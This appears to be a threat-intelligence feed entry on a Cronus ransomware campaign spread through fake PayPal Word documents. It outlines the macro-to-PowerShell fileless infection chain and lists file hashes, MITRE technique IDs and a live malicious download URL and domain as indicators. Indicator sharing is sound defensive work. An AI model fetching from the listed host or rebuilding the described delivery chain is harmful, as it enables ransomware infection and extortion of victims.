Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell

Aug. 7, 2024, 8:37 a.m.

Description

The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This loader employs reflective DLL loading to execute the fileless ransomware payload directly in memory, evading disk-based detection. The ransomware exhibits various malicious behaviors, such as enumerating and encrypting specific file types, terminating processes, establishing persistence, and manipulating clipboard data.

External References

https://www.seqrite.com/blog/unmasking-cronus-how-fake-paypal-documents-deliver-fileless-ransomware-via-powershell/
https://otx.alienvault.com/pulse/66b3311df1f0791c05cb53b7
Tags
phishing
ransomware
powershell
fileless
2024-08-07
cronus

Date

  • Created: Aug. 7, 2024, 8:32 a.m.
  • Published: Aug. 7, 2024, 8:32 a.m.
  • Modified: Aug. 7, 2024, 8:37 a.m.

Indicators

  • dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3
  • afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987
  • 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
  • 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3
  • 629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53
  • 42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad
  • https://eternal.lol/file/
  • eternal.lol
Download all indicators here!

Attack Patterns

  • Cronus Ransomware
  • Cronus
  • T1491.001
  • T1565.002
  • T1055.012
  • T1059.005
  • T1059.001
  • T1547.001
  • T1204.002
  • T1486
  • T1057
  • T1566.001
  • T1083